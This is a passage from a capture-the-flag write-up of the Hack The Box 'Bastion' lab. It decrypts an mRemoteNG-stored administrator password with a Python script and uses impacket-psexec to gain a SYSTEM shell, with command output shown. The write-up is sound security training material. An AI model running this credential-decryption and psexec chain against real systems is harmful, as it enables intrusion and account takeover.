mRemoteNG Decryptor
I found this Python script that decrypts the encrypted credentials stored in mRemoteNG
┌──(kali㉿kali)-[~/archive/htb/labs/bastion]
└─$ python3 mRemoteNG_decryptor.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
password: thXLHM96BeKL0ER2
Running the Python script with the -s
flag to provide the encrypted base64 string just gives me the password
The decrypted password for the administrator
user is thXLHM96BeKL0ER2
Privilege Escalation
┌──(kali㉿kali)-[~/archive/htb/labs/bastion]
└─$ impacket-psexec 'administrator:thXLHM96BeKL0ER2@bastion' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.134.....
[*] Found writable share ADMIN$
[*] Uploading file KiABPSOp.exe
[*] Opening SVCManager on 10.10.10.134.....
[*] Creating service qJVQ on 10.10.10.134.....
[*] Starting service qJVQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
Bastion
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::201
IPv6 Address. . . . . . . . . . . : dead:beef::25e3:a1fe:1ad9:366b
Link-local IPv6 Address . . . . . : fe80::25e3:a1fe:1ad9:366b%4
IPv4 Address. . . . . . . . . . . : 10.10.10.134
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%4
10.10.10.2
Tunnel adapter isatap.{8253841C-588D-4E94-B23A-993BB2E4B4D9}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : htb
System Level Compromise